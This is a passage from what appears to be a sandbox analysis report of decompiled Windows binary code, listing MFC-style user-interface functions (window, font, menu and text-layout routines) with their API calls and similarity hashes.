                                            				return  *(_t75 - 0x14);
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00413826
                                            • GetPropA.USER32 ref: 0041383E
                                            • CallWindowProcA.USER32 ref: 0041389C
                                              • Part of subcall function 0041342F: GetWindowRect.USER32 ref: 00413454
                                              • Part of subcall function 0041342F: GetWindow.USER32(?,00000004), ref: 00413471
                                            • SetWindowLongA.USER32 ref: 004138CC
                                            • RemovePropA.USER32 ref: 004138D4
                                            • GlobalFindAtomA.KERNEL32 ref: 004138DB
                                            • GlobalDeleteAtom.KERNEL32 ref: 004138E2
                                              • Part of subcall function 0041340C: GetWindowRect.USER32 ref: 00413418
                                            • CallWindowProcA.USER32 ref: 00413936
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                            • String ID: AfxOldWndProc423
                                            • API String ID: 2397448395-1060338832
                                            • Opcode ID: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
                                            • Instruction ID: 4899527f46ba9a8eebcd092d04d92ea77ba6043ae45329b01eeefbc2baec0ec1
                                            • Opcode Fuzzy Hash: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
                                            • Instruction Fuzzy Hash: F3316F7290011ABBCB12AFA5DD49EFF7FB8EF09712F00402AF501A2151C7799A519BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004251B9() {
                                            				int _t1;
                                            				int _t7;
                                            				struct HDC__* _t12;
                                            				void* _t18;
                                            
                                            				_t1 =  *0x436880; // 0xffffffff
                                            				if(_t1 == 0xffffffff) {
                                            					_t12 = GetDC(0);
                                            					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                            					if(_t18 != 0) {
                                            						_t18 = SelectObject(_t12, _t18);
                                            					}
                                            					GetCharWidthA(_t12, 0x36, 0x36, 0x436880);
                                            					if(_t18 != 0) {
                                            						SelectObject(_t12, _t18);
                                            						DeleteObject(_t18);
                                            					}
                                            					ReleaseDC(0, _t12);
                                            					_t7 =  *0x436880; // 0xffffffff
                                            					return _t7;
                                            				}
                                            				return _t1;
                                            			}

                                            APIs
                                            • GetDC.USER32(00000000), ref: 004251CA
                                            • GetSystemMetrics.USER32 ref: 004251EA
                                            • CreateFontA.GDI32(00000000,?,?,00425352,00001000,?,?), ref: 004251F1
                                            • SelectObject.GDI32(00000000,00000000), ref: 00425205
                                            • GetCharWidthA.GDI32(00000000,00000036,00000036,00436880), ref: 00425213
                                            • SelectObject.GDI32(00000000,00000000), ref: 0042521F
                                            • DeleteObject.GDI32(00000000), ref: 00425222
                                            • ReleaseDC.USER32 ref: 0042522A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                            • String ID: Marlett
                                            • API String ID: 1397664628-3688754224
                                            • Opcode ID: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
                                            • Instruction ID: 574e7069028db96244f8dd859ef817299f0475ae2c7f4c91e639d061ecb05676
                                            • Opcode Fuzzy Hash: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
                                            • Instruction Fuzzy Hash: A901A2317413507BC2312B266C8DE6B3F7CD7CBFA1B914225F515A2190CB654C01C6BC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004037D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                            				void* _t21;
                                            
                                            				if(_a44 < 0 || _a44 >= 0x14) {
                                            					_a44 = 0;
                                            				}
                                            				_t21 =  *((intOrPtr*)(0x4362b0 + _a44 * 4))(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
                                            				return _t21;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
                                            • Instruction ID: c8df5cefcab56e12fb6afff3c38bb4f7a638dfcd913fb832871c6968f8fa9c0e
                                            • Opcode Fuzzy Hash: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
                                            • Instruction Fuzzy Hash: 4EF1E4B2A00108EBCB04CF99D995EEE77B9BF8C308F118259F919A7240D735EA15CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E0042914E(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
                                            				intOrPtr _v8;
                                            				int _v12;
                                            				int _v16;
                                            				int _v20;
                                            				signed int _v24;
                                            				CHAR* _v28;
                                            				int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				struct tagSIZE _v48;
                                            				struct tagPOINT _v56;
                                            				struct tagSIZE _v64;
                                            				struct tagTEXTMETRICA _v120;
                                            				struct tagTEXTMETRICA _v176;
                                            				signed int _t119;
                                            				signed int _t120;
                                            				int _t121;
                                            				signed int* _t125;
                                            				long* _t127;
                                            				signed int _t131;
                                            				signed char _t132;
                                            				int _t140;
                                            				signed char* _t142;
                                            				int _t144;
                                            				int _t149;
                                            				int _t153;
                                            				signed int _t156;
                                            				signed short _t159;
                                            				signed char* _t167;
                                            				int* _t170;
                                            				signed int _t174;
                                            				int _t175;
                                            				int _t185;
                                            				signed int _t187;
                                            				int _t189;
                                            				int _t190;
                                            				void* _t191;
                                            				int* _t193;
                                            
                                            				_t191 = __ecx;
                                            				GetTextMetricsA( *(__ecx + 8),  &_v120);
                                            				GetTextMetricsA( *(__ecx + 4),  &_v176);
                                            				GetTextExtentPoint32A( *(__ecx + 8), 0x42e890, 1,  &_v48);
                                            				_t119 = GetTextAlign( *(__ecx + 8));
                                            				_v40 = _t119;
                                            				_t120 = _t119 & 0x00000001;
                                            				_v36 = _t120;
                                            				if(_t120 == 0) {
                                            					_t170 = _a8;
                                            				} else {
                                            					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
                                            					_t170 = _a8;
                                            					 *_t170 = _v56.x;
                                            				}
                                            				_t121 =  *_t170;
                                            				_t193 = _a40;
                                            				_t167 = _a12;
                                            				_t185 = 0;
                                            				_v28 = _t167;
                                            				_v32 = _t121;
                                            				_a12 = _t121;
                                            				_v12 = 0;
                                            				_v20 = 0;
                                            				if(_a20 != 0) {
                                            					if(_a24 != 1) {
                                            						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x42e88c, 1, 0, 0);
                                            						_t170 = _a8;
                                            						_t185 = 0;
                                            						_v20 = _t159 & 0x0000ffff;
                                            					} else {
                                            						_v20 =  *_a28;
                                            					}
                                            				}
                                            				_v8 = _t185;
                                            				if( *_a16 <= _t185) {
                                            					L31:
                                            					_t187 = _v40 & 0x00000006;
                                            					_v48.cx = _a12 -  *_t170;
                                            					_t125 = _a44;
                                            					 *_t125 =  *_t125 & 0x00000000;
                                            					if(_t187 != 0) {
                                            						if(_t187 != 6) {
                                            							if(_t187 == 2) {
                                            								 *_t125 = _v12;
                                            							}
                                            							L38:
                                            							if(_v36 != 0) {
                                            								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
                                            							}
                                            							 *_a16 = _t193 - _a40 >> 2;
                                            							_t127 = _a4;
                                            							 *_t127 = _v48.cx;
                                            							_t127[1] = _v48.cy;
                                            							return _t127;
                                            						}
                                            						asm("cdq");
                                            						_t131 = _v12 - _t187 >> 1;
                                            						L33:
                                            						 *_t170 =  *_t170 + _t131;
                                            						goto L38;
                                            					}
                                            					_t131 = _v12;
                                            					goto L33;
                                            				} else {
                                            					while(1) {
                                            						_t132 =  *_t167;
                                            						_t174 = 0 | _t132 == _v120.tmBreakChar;
                                            						_v24 = _t174;
                                            						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
                                            							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
                                            							_t140 = _v64.cx - _v120.tmOverhang + _v32;
                                            							if(_v24 == 0) {
                                            								_t140 = E0042911A(_t140, _a24, _a28, _a32, _v20);
                                            							}
                                            							_t175 = _t140;
                                            							if(_t193 != _a40) {
                                            								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
                                            							} else {
                                            								_v12 = _v12 + _t175 - _a12;
                                            							}
                                            							_a12 = _t140;
                                            							_v32 = _t140;
                                            							_v28 =  &(_t167[1]);
                                            						} else {
                                            							_t144 = _t132 & 0x000000ff;
                                            							if(( *(_t144 + 0x43b761) & 0x00000004) == 0) {
                                            								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
                                            								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
                                            									 *_t193 = _v120.tmAveCharWidth;
                                            								}
                                            								_t189 = _v16;
                                            							} else {
                                            								_t189 = _v176.tmAveCharWidth;
                                            								 *_t193 = _v120.tmAveCharWidth;
                                            							}
                                            							_t190 = _t189 - _v176.tmOverhang;
                                            							 *_t193 =  *_t193 - _v120.tmOverhang;
                                            							_t149 =  *_t193;
                                            							_a12 = _a12 + _t149;
                                            							_v16 = _t190;
                                            							if(_t193 != _a40) {
                                            								asm("cdq");
                                            								_t156 = _t149 - _t190 - _t190 >> 1;
                                            								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
                                            								 *_t193 = _t149 - _t156;
                                            							}
                                            							_a36 = _a36 + 1;
                                            							 *_a36 =  *_t167;
                                            							if(( *(( *_t167 & 0x000000ff) + 0x43b761) & 0x00000004) != 0) {
                                            								_a36 = _a36 + 1;
                                            								 *_a36 = _t167[1];
                                            								_t153 =  *_t193;
                                            								_a12 = _a12 + _t153;
                                            								_t193 =  &(_t193[1]);
                                            								_v8 = _v8 + 1;
                                            								 *_t193 = _t153;
                                            							}
                                            							_t193 =  &(_t193[1]);
                                            						}
                                            						_t142 = E00406AFA(_t167);
                                            						_v8 = _v8 + 1;
                                            						_t167 = _t142;
                                            						if(_v8 >=  *_a16) {
                                            							break;
                                            						}
                                            						_t185 = 0;
                                            					}
                                            					_t170 = _a8;
                                            					goto L31;
                                            				}
                                            			}

                                            APIs
                                            • GetTextMetricsA.GDI32(?,?), ref: 00429168
                                            • GetTextMetricsA.GDI32(?,?), ref: 00429174
                                            • GetTextExtentPoint32A.GDI32(?,0042E890,00000001,?), ref: 00429184
                                            • GetTextAlign.GDI32(?), ref: 0042918D
                                            • GetCurrentPositionEx.GDI32(?,?), ref: 004291A5
                                            • GetTabbedTextExtentA.USER32(?,0042E88C,00000001,00000000,00000000), ref: 004291F3
                                            • GetCharWidthA.GDI32(?,?,?,?), ref: 0042925A
                                            • GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 00429269
                                            • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004292E9
                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00429397
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
                                            • String ID:
                                            • API String ID: 2070200100-0
                                            • Opcode ID: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
                                            • Instruction ID: 5ee3fa6e800e5c42c7f25724716c3f9a342090dd9abbfd9a25ef7c0a74f7065c
                                            • Opcode Fuzzy Hash: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
                                            • Instruction Fuzzy Hash: EE914670A0021AEFCF15CFA8D884AEEBBB5FF48304F54856AE859A7250D334AD51CF64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E0042185A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				int _v16;
                                            				signed int _v32;
                                            				intOrPtr _v36;
                                            				signed int _v40;
                                            				int _v44;
                                            				char _v48;
                                            				void* __ebp;
                                            				int _t53;
                                            				int _t58;
                                            				int _t61;
                                            				signed int _t65;
                                            				int _t66;
                                            				void* _t67;
                                            				int _t69;
                                            				intOrPtr _t73;
                                            				int _t74;
                                            				int _t75;
                                            				intOrPtr* _t77;
                                            				struct HMENU__* _t83;
                                            				intOrPtr _t84;
                                            
                                            				_t73 = __ecx;
                                            				_v8 = __ecx;
                                            				_t53 = E0041A8B4( *((intOrPtr*)(__ecx + 0x1c)));
                                            				if(_a12 == 0) {
                                            					_t77 =  *((intOrPtr*)(__ecx + 0x68));
                                            					_t84 = _a4;
                                            					if(_t77 == 0) {
                                            						L3:
                                            						E00412F9D( &_v48);
                                            						_v36 = _t84;
                                            						if( *((intOrPtr*)(E004249C4() + 0x54)) !=  *(_t84 + 4)) {
                                            							if(GetMenu( *(_t73 + 0x1c)) != 0) {
                                            								_t67 = E00414CEF(_t73);
                                            								if(_t67 != 0) {
                                            									_t83 = GetMenu( *(_t67 + 0x1c));
                                            									if(_t83 != 0) {
                                            										_t69 = GetMenuItemCount(_t83);
                                            										_t75 = 0;
                                            										_a12 = _t69;
                                            										if(_t69 > 0) {
                                            											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
                                            												_t75 = _t75 + 1;
                                            												if(_t75 < _a12) {
                                            													continue;
                                            												} else {
                                            												}
                                            												goto L13;
                                            											}
                                            											_push(_t83);
                                            											_v12 = E00417635();
                                            										}
                                            										L13:
                                            										_t73 = _v8;
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							_v12 = _t84;
                                            						}
                                            						_t53 = GetMenuItemCount( *(_t84 + 4));
                                            						_v40 = _v40 & 0x00000000;
                                            						_v16 = _t53;
                                            						if(_t53 > 0) {
                                            							do {
                                            								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
                                            								_v44 = _t58;
                                            								if(_t58 != 0) {
                                            									if(_t58 != 0xffffffff) {
                                            										_v32 = _v32 & 0x00000000;
                                            										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
                                            											_push(1);
                                            											_pop(0);
                                            										}
                                            										_push(0);
                                            										goto L27;
                                            									} else {
                                            										_push(GetSubMenu( *(_t84 + 4), _v40));
                                            										_t65 = E00417635();
                                            										_v32 = _t65;
                                            										if(_t65 != 0) {
                                            											_t66 = GetMenuItemID( *(_t65 + 4), 0);
                                            											_v44 = _t66;
                                            											if(_t66 != 0 && _t66 != 0xffffffff) {
                                            												_push(0);
                                            												L27:
                                            												_push(_t73);
                                            												E00413162( &_v48);
                                            												_t61 = GetMenuItemCount( *(_t84 + 4));
                                            												_t74 = _t61;
                                            												if(_t74 < _v16) {
                                            													_v40 = _v40 + _t61 - _v16;
                                            													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
                                            														_v40 = _v40 + 1;
                                            													}
                                            												}
                                            												_v16 = _t74;
                                            												_t73 = _v8;
                                            											}
                                            										}
                                            									}
                                            								}
                                            								_v40 = _v40 + 1;
                                            								_t53 = _v40;
                                            							} while (_t53 < _v16);
                                            						}
                                            					} else {
                                            						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
                                            						if(_t53 == 0) {
                                            							goto L3;
                                            						}
                                            					}
                                            				}
                                            				return _t53;
                                            			}

                                            APIs
                                              • Part of subcall function 0041A8B4: GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
                                              • Part of subcall function 0041A8B4: GetParent.USER32(00000000), ref: 0041A8DE
                                              • Part of subcall function 0041A8B4: GetWindowLongA.USER32 ref: 0041A8F9
                                              • Part of subcall function 0041A8B4: GetParent.USER32(?), ref: 0041A907
                                              • Part of subcall function 0041A8B4: GetDesktopWindow.USER32 ref: 0041A90B
                                              • Part of subcall function 0041A8B4: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F
                                            • GetMenu.USER32(?), ref: 004218BD
                                            • GetMenu.USER32(?), ref: 004218D1
                                            • GetMenuItemCount.USER32 ref: 004218DA
                                            • GetSubMenu.USER32 ref: 004218EB
                                            • GetMenuItemCount.USER32 ref: 0042190D
                                            • GetMenuItemID.USER32(?,00000000), ref: 0042192E
                                            • GetSubMenu.USER32 ref: 00421946
                                            • GetMenuItemID.USER32(?,00000000), ref: 0042195E
                                            • GetMenuItemCount.USER32 ref: 00421995
                                            • GetMenuItemID.USER32(?,00000000), ref: 004219B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                            • String ID:
                                            • API String ID: 4186786570-0
                                            • Opcode ID: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
                                            • Instruction ID: c2df077858419d5e37a5876f97d7879e649ce0b97625e1102e6641939069eb9a
                                            • Opcode Fuzzy Hash: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
                                            • Instruction Fuzzy Hash: C35190B0B002189FCF11EF65D990BAEB7B5EF18314FA0446AE411E6261D739DD82DF68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E00420900() {
                                            				void* __ecx;
                                            				void* __ebp;
                                            				struct HWND__* _t21;
                                            				int _t33;
                                            				void* _t40;
                                            				void* _t41;
                                            				struct HWND__* _t46;
                                            				struct HWND__* _t47;
                                            				signed int _t48;
                                            				signed int _t49;
                                            				void* _t50;
                                            
                                            				_t40 = _t41;
                                            				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
                                            				_t21 = _t40 + 0xa0;
                                            				if( *(_t40 + 0xa0) > 1) {
                                            					L18:
                                            					return _t21;
                                            				}
                                            				 *((intOrPtr*)(_t50 + 0x14)) = E00414CEF(_t41);
                                            				_t48 = 0;
                                            				_t21 = GetWindow(GetDesktopWindow(), 5);
                                            				_t46 = _t21;
                                            				if(_t46 == 0) {
                                            					goto L18;
                                            				} else {
                                            					goto L2;
                                            				}
                                            				do {
                                            					L2:
                                            					if(IsWindowEnabled(_t46) != 0) {
                                            						_push(_t46);
                                            						if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
                                            							_t48 = _t48 + 1;
                                            						}
                                            					}
                                            					_t21 = GetWindow(_t46, 2);
                                            					_t46 = _t21;
                                            				} while (_t46 != 0);
                                            				if(_t48 != 0) {
                                            					 *(_t40 + 0xa4) = E004131DD(4 + _t48 * 4);
                                            					_push(5);
                                            					_t49 = 0;
                                            					_push(GetDesktopWindow());
                                            					while(1) {
                                            						_t47 = GetWindow();
                                            						if(_t47 == 0) {
                                            							break;
                                            						}
                                            						if(IsWindowEnabled(_t47) != 0) {
                                            							_push(_t47);
                                            							if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
                                            								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
                                            								if(_t33 == 0) {
                                            									EnableWindow(_t47, _t33);
                                            									( *(_t40 + 0xa4))[_t49] = _t47;
                                            									_t49 = _t49 + 1;
                                            								}
                                            							}
                                            						}
                                            						_push(2);
                                            						_push(_t47);
                                            					}
                                            					_t21 =  *(_t40 + 0xa4);
                                            					_t21[_t49] = _t21[_t49] & 0x00000000;
                                            				}
                                            			}















                                            APIs
                                            • GetDesktopWindow.USER32 ref: 0042092D
                                            • GetWindow.USER32(00000000), ref: 0042093A
                                            • IsWindowEnabled.USER32(00000000), ref: 00420947
                                            • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00420976
                                            • GetWindow.USER32(00000000,00000002), ref: 00420984
                                            • GetDesktopWindow.USER32 ref: 004209AC
                                            • GetWindow.USER32(00000000), ref: 004209B3
                                            • IsWindowEnabled.USER32(00000000), ref: 004209BC
                                            • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 004209EB
                                            • EnableWindow.USER32(00000000,00000000), ref: 004209F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$DesktopEnabledMessageSend$Enable
                                            • String ID:
                                            • API String ID: 2339141687-0
                                            • Opcode ID: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
                                            • Instruction ID: 9d4a9da4e21fb217c8a7ce5c71c2f292f8e7f618580f1a2ae5b0fad087dd6ca4
                                            • Opcode Fuzzy Hash: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
                                            • Instruction Fuzzy Hash: 6B31B1717013286FE731AF25AC05B6B779CEF01795F850026FE41DA293DB68C8418AED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041EC61(void* __ecx, int _a4) {
                                            				int _v8;
                                            				struct tagRECT _v24;
                                            				int _t39;
                                            				int _t42;
                                            				int _t61;
                                            				int _t64;
                                            				void* _t66;
                                            				long _t67;
                                            				int _t69;
                                            
                                            				_t67 = _a4;
                                            				_t66 = __ecx;
                                            				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
                                            				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
                                            					GetWindowRect( *(_t66 + 0x1c),  &_v24);
                                            					_t42 = _a4;
                                            					_t69 = _v24.right - _v24.left;
                                            					_t64 =  *(_t42 + 0x10);
                                            					_t61 = _v24.bottom - _v24.top;
                                            					_t39 =  *(_t42 + 0x14);
                                            					_v8 = _t64;
                                            					_a4 = _t39;
                                            					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
                                            						SetRect( &_v24, _t64 -  *0x439bf0, 0, _t64, _t39);
                                            						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            						SetRect( &_v24, _t69 -  *0x439bf0, 0, _t69, _a4);
                                            						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            						_t64 = _v8;
                                            						_t39 = _a4;
                                            					}
                                            					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
                                            						SetRect( &_v24, 0, _t39 -  *0x439bf4, _t64, _t39);
                                            						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            						SetRect( &_v24, 0, _t61 -  *0x439bf4, _v8, _t61);
                                            						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
                                            					}
                                            				}
                                            				return _t39;
                                            			}













                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 0041EC77
                                            • GetWindowRect.USER32 ref: 0041EC8E
                                            • SetRect.USER32 ref: 0041ECC8
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ECD7
                                            • SetRect.USER32 ref: 0041ECEE
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ECFD
                                            • SetRect.USER32 ref: 0041ED28
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ED33
                                            • SetRect.USER32 ref: 0041ED4A
                                            • InvalidateRect.USER32(?,?,00000001), ref: 0041ED55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Invalidate$Window$Proc
                                            • String ID:
                                            • API String ID: 570070710-0
                                            • Opcode ID: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
                                            • Instruction ID: 516b3e1e2029e257780fbb0876dd7829c2ddb4b881f79dfa1f5106cbf91c212e
                                            • Opcode Fuzzy Hash: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
                                            • Instruction Fuzzy Hash: EC31CB7590020ABFDB10DF94ED88FAA7B7DFB04344F544125FA01A61A0D774AE95CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00409911(void* __edi, long _a4) {
                                            				char _v164;
                                            				char _v424;
                                            				int _t17;
                                            				long _t19;
                                            				signed int _t42;
                                            				long _t47;
                                            				void* _t48;
                                            				signed int _t54;
                                            				void** _t56;
                                            				void* _t57;
                                            
                                            				_t48 = __edi;
                                            				_t47 = _a4;
                                            				_t42 = 0;
                                            				_t17 = 0x437068;
                                            				while(_t47 !=  *_t17) {
                                            					_t17 = _t17 + 8;
                                            					_t42 = _t42 + 1;
                                            					if(_t17 < 0x4370f8) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				_t54 = _t42 << 3;
                                            				_t2 = _t54 + 0x437068; // 0x3c000000
                                            				if(_t47 ==  *_t2) {
                                            					_t17 =  *0x439cf0; // 0x0
                                            					if(_t17 == 1 || _t17 == 0 &&  *0x436ba4 == 1) {
                                            						_t16 = _t54 + 0x43706c; // 0x42f53c
                                            						_t56 = _t16;
                                            						_t19 = E00405A40( *_t56);
